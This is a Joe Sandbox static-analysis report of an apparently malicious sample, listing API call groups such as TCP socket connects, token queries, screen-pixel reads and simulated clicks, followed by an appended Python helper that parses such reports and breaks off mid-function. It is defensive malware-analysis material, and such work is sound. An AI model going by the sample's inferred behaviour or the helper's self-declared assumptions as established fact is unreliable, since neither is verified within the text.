                                      • Instruction Fuzzy Hash: D1416D35509119FFDF159F68C844EEABBB8FB46334F104319F82A96290CB34A994DFA1
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0096B369
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0096B413
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0096B41B
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0096B429
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0096B431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: a9a3350cad51837c70aa49e9c24d4994f0419d08e97c6d8e9f9066fb41c97330
                                      • Instruction ID: 0108a2bc5ee7a332c3c8ffbef51dabd46ffee45fdba8526c449d4a67c9ccef18
                                      • Opcode Fuzzy Hash: a9a3350cad51837c70aa49e9c24d4994f0419d08e97c6d8e9f9066fb41c97330
                                      • Instruction Fuzzy Hash: 9831D171905219EBDF04CF68DE4DA9E3BB9EB04325F104229F921EB2D1E7B09954DB90
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0096DBD7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0096DBF4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0096DC2C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0096DC52
                                      • _wcsstr.LIBCMT ref: 0096DC5C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: b12742a5a139bd77b99357590184a72ef596637dc1f67baa78914b08ba51562c
                                      • Instruction ID: 6213ac79c51759dbd6242419aad71567c9e7badfd65b9b21897b4bcd47ed7aae
                                      • Opcode Fuzzy Hash: b12742a5a139bd77b99357590184a72ef596637dc1f67baa78914b08ba51562c
                                      • Instruction Fuzzy Hash: DB212672B09208BBEB159F39DD49E7B7BACDF85760F104039F809CA191EAA5CC01D3A0
                                      APIs
                                        • Part of subcall function 009350E6: _wcsncpy.LIBCMT ref: 009350FA
                                      • GetFileAttributesW.KERNEL32(?,?,?,?,009760C3), ref: 00976369
                                      • GetLastError.KERNEL32(?,?,?,009760C3), ref: 00976374
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009760C3), ref: 00976388
                                      • _wcsrchr.LIBCMT ref: 009763AA
                                        • Part of subcall function 00976318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009760C3), ref: 009763E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                      • String ID:
                                      • API String ID: 3633006590-0
                                      • Opcode ID: 481b10661ec94151e8281cee1c579aa7481749a3ec1b361a0a295fb5f48c6925
                                      • Instruction ID: 1111b36daf18cccf7ac357fa3d5e539054c373483d40b98509b38970a8943e52
                                      • Opcode Fuzzy Hash: 481b10661ec94151e8281cee1c579aa7481749a3ec1b361a0a295fb5f48c6925
                                      • Instruction Fuzzy Hash: 39212732515A158BDB15EB78AC52FFA33ACEF06760F108466F44DD31C0EB60D984DB51
                                      APIs
                                        • Part of subcall function 0098A82C: inet_addr.WS2_32(00000000), ref: 0098A84E
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00988BD3
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988BE2
                                      • connect.WS2_32(00000000,?,00000010), ref: 00988BFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 3701255441-0
                                      • Opcode ID: b49c84aaad93c4af9e021a888882b443370fda1ff1c7973a6e0b548dc46b66da
                                      • Instruction ID: 8f5a892499463a167cf64df2b51ab0fb65e868bd0ab77e28e58136de4bf3fd1f
                                      • Opcode Fuzzy Hash: b49c84aaad93c4af9e021a888882b443370fda1ff1c7973a6e0b548dc46b66da
                                      • Instruction Fuzzy Hash: 0421AE712002149FCB10AF28C985F7E77ADAF88720F048559F956AB392DF74AC018B61
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00988441
                                      • GetForegroundWindow.USER32 ref: 00988458
                                      • GetDC.USER32(00000000), ref: 00988494
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 009884A0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 009884DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: 3ef2d510fbd32721ff910ecfa0d5ce12cb7dec344d952f4da0e0dd525dc1e6c3
                                      • Instruction ID: cda68384e60325af3087f1c5085667a084638e081e887fb74f3e32681ce00739
                                      • Opcode Fuzzy Hash: 3ef2d510fbd32721ff910ecfa0d5ce12cb7dec344d952f4da0e0dd525dc1e6c3
                                      • Instruction Fuzzy Hash: EC218176A01204AFD710EFA4D989BAEBBE5EF88311F048479F85997351DB70AD00DB60
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                      • SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                      • BeginPath.GDI32(?), ref: 0094B009
                                      • SelectObject.GDI32(?,00000000), ref: 0094B033
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: a318d01fbfeb5214aabde9a0cf833789c6f75535f79ae058ceb4664f8cbafc9b
                                      • Instruction ID: d0ba9dcf28ca801b3baee80bfffeba2a4b438c7138a846b54ce15d066048fbf2
                                      • Opcode Fuzzy Hash: a318d01fbfeb5214aabde9a0cf833789c6f75535f79ae058ceb4664f8cbafc9b
                                      • Instruction Fuzzy Hash: 9C2183B0829305EFDB10DF55EC44BAA7B6CB711366F14431AE421E21A0D3718845EFD1
                                      APIs
                                      • __calloc_crt.LIBCMT ref: 009521A9
                                      • CreateThread.KERNEL32(?,?,009522DF,00000000,?,?), ref: 009521ED
                                      • GetLastError.KERNEL32 ref: 009521F7
                                      • _free.LIBCMT ref: 00952200
                                      • __dosmaperr.LIBCMT ref: 0095220B
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                      • String ID:
                                      • API String ID: 2664167353-0
                                      • Opcode ID: aef0da00d5ea6d3227416b430961f62febbbcf803224d303e5530db05043a54c
                                      • Instruction ID: bbd24e0143815f77e8ec2579e0561f8052b28c569951c09e88db56559628e736
                                      • Opcode Fuzzy Hash: aef0da00d5ea6d3227416b430961f62febbbcf803224d303e5530db05043a54c
                                      • Instruction Fuzzy Hash: 3F1108361097466F9B15EFA7EC42E6B7798EF82771F100529FD2486141EB31D81987A0
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                      • GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                      • GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                      • RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 883493501-0
                                      • Opcode ID: df39be9d3d2bde073fa1603c61da3c6b51ae9066ec0327e14d88a540f682ee32
                                      • Instruction ID: e3fc627ffb31e5d9da2b8395b3af49f6a05489c46a85cc75dd2e6e8fb7ef9cd1
                                      • Opcode Fuzzy Hash: df39be9d3d2bde073fa1603c61da3c6b51ae9066ec0327e14d88a540f682ee32
                                      • Instruction Fuzzy Hash: B601AF70215204BFDB144FA9DD48DAB3BACFF8A3647100529F845D3260EA75CC40DF60
                                      APIs
                                      • CLSIDFromProgID.COMBASE ref: 00969ADC
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00969AF7
                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00969B05
                                      • CoTaskMemFree.COMBASE(00000000), ref: 00969B15
                                      • CLSIDFromString.COMBASE(?,?), ref: 00969B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 321399adb41e4f0faf55e3a508ae931beb9e9ed9aadeecc326c5ff20255c0f14
                                      • Instruction ID: abda3803be73ed4fd743aca2a525e21d0d5730b6ec57d7b72379444cb3d7c987
                                      • Opcode Fuzzy Hash: 321399adb41e4f0faf55e3a508ae931beb9e9ed9aadeecc326c5ff20255c0f14
                                      • Instruction Fuzzy Hash: 7A01D176611209BFDB104F68EE44BAABBFDEF483A2F148024FD05D2210E770DD00ABA0
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977A74
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00977A82
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00977A8A
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00977A94
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: cd60518e1467b2f0c32d72eab8e3918e54d9c4176939946f716b22ccbb734dfe
                                      • Instruction ID: be12b8bc6b910d2249ff8568b56ad7de07f852f4752d170450dfcd3fba814ffc
                                      • Opcode Fuzzy Hash: cd60518e1467b2f0c32d72eab8e3918e54d9c4176939946f716b22ccbb734dfe
                                      • Instruction Fuzzy Hash: B2016976C0961DEBEF08AFE8DD48ADDFB78FB08311F004555E402B2150EB3096509BA1
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0096AADA
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0096AAE4
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096AAF3
                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0096AAFA
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096AB10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: 414d4f4ada7ebf97a484410e4918168d1d663fbbfa3fb596da0f9e5bc55475ae
                                      • Instruction ID: 3c6cd85eb8b7d9f99d50c05d407767e8aab71776cabf54c5ed1243bfd6bd193a
                                      • Opcode Fuzzy Hash: 414d4f4ada7ebf97a484410e4918168d1d663fbbfa3fb596da0f9e5bc55475ae
                                      • Instruction Fuzzy Hash: 6FF062712152096FEB111FB4EC88E673BADFF45764F000129F941D7190DA609C01DF61
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0096AA79
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0096AA83
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0096AA92
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0096AA99
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096AAAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: 757bdd8efa5ffde30c78bb988004869a21b7063f3ccd4a727235fc7814c353c1
                                      • Instruction ID: 85cd68409cb48dc9d6b0a612c9230af8761767e6ac889ae04e3897d53fd6df3f
                                      • Opcode Fuzzy Hash: 757bdd8efa5ffde30c78bb988004869a21b7063f3ccd4a727235fc7814c353c1
                                      • Instruction Fuzzy Hash: 84F0AF312152046FEB101FA4AD89E673BADFF49764F00012AF901D7190EA609C01DA61
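The two GetTokenInformation functions above (0096AA79 and 0096AADA) and the GetUserObjectSecurity function at 0096ABD7 all show the same size-probe idiom: call with a NULL buffer, GetLastError, GetProcessHeap/RtlAllocateHeap, call again with the allocated buffer. The socket function at 00988BD3 shows socket(00000002,00000001,00000006), which is AF_INET/SOCK_STREAM/IPPROTO_TCP. The helper below is an added example, not part of the Joe Sandbox report: it parses "APIs" blocks in exactly this layout, decodes the raw hex constants with the Windows SDK values, flags capabilities and the size-probe idiom per function, and decodes the .sdmp file name. The field order assumed for the .sdmp name (pid index, stage, dump id, base address, page protection, unknown, memory type, unknown) and the capability rule set are assumptions; the constant values (PAGE_*, MEM_*, TOKEN_INFORMATION_CLASS, winsock families) are the SDK ones. One check this surfaces: winnt.h defines TokenPrivileges = 3 and TokenIntegrityLevel = 25, so the `00000003(TokenIntegrityLevel)` annotation at 0096AADA should be read against those values; the decoder uses winnt.h.

```python
"""Triage helper for Joe Sandbox per-function 'APIs' blocks (added example,
not part of the report). Parses the block layout, decodes raw constants,
flags capabilities and the size-probe allocation idiom."""
import re
from dataclasses import dataclass, field

# Constructed sample: two blocks copied in the report's own layout.
SAMPLE = """\
APIs
  • Part of subcall function 0098A82C: inet_addr.WS2_32(00000000), ref: 0098A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00988BD3
• WSAGetLastError.WS2_32(00000000), ref: 00988BE2
• connect.WS2_32(00000000,?,00000010), ref: 00988BFE
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0096AA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0096AA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0096AA92
• RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0096AA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096AAAF
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
"""

# One bullet line: optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})$")
# .sdmp name: field order is an ASSUMPTION about Joe Sandbox's naming scheme.
DUMP_RE = re.compile(
    r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.[0-9A-F]{8}\.([0-9A-F]{8})\.[0-9A-F]{8}\.sdmp")

# Windows SDK constants (winnt.h / winsock2.h), not assumptions.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
TOKEN_INFO_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 25: "TokenIntegrityLevel"}
SOCKET_ARGS = ({2: "AF_INET", 23: "AF_INET6"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
               {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"})
ALLOCATORS = {"RtlAllocateHeap", "HeapAlloc", "__calloc_crt", "_malloc", "VirtualAlloc"}
# Assumed triage rules: every listed API must appear in the function's block.
CAPABILITY_RULES = {"tcp_connect": {"socket", "connect"}, "token_query": {"GetTokenInformation"},
                    "thread_create": {"CreateThread"}, "screen_pixel_read": {"GetDC", "GetPixel"},
                    "mkdir": {"CreateDirectoryW"}}


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    dump: str = ""

    def names(self):
        return [c.name for c in self.calls if not c.subcall]


def parse_report(text):
    """Split report text into FunctionBlocks; one block per 'APIs' heading."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is not None and line.startswith("• Source File:"):
            cur.dump = line.split("Source File:", 1)[1].split(",", 1)[0].strip()
        elif cur is not None and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
    return blocks


def hexarg(a):
    """'00000003(TokenIntegrityLevel)' -> 3, '?' -> None, non-hex stays a string."""
    if a == "?":
        return None
    try:
        return int(a.split("(")[0], 16)
    except ValueError:
        return a


def describe_call(call):
    """Symbolic names for the constants the report prints as raw hex."""
    vals = [hexarg(a) for a in call.args]
    if call.name == "socket" and len(vals) >= 3:
        return [tbl.get(v, v) for tbl, v in zip(SOCKET_ARGS, vals[:3])]
    if call.name == "GetTokenInformation" and len(vals) >= 2:
        return [TOKEN_INFO_CLASS.get(vals[1], vals[1])]
    return []


def capabilities(block):
    seen = {c.name for c in block.calls}
    return sorted(cap for cap, need in CAPABILITY_RULES.items() if need <= seen)


def size_probe(block):
    """Name of an API called before and again after an allocator: the
    'NULL buffer -> needed size -> allocate -> call again' idiom."""
    names = block.names()
    for i, n in enumerate(names):
        if n in names[i + 1:]:
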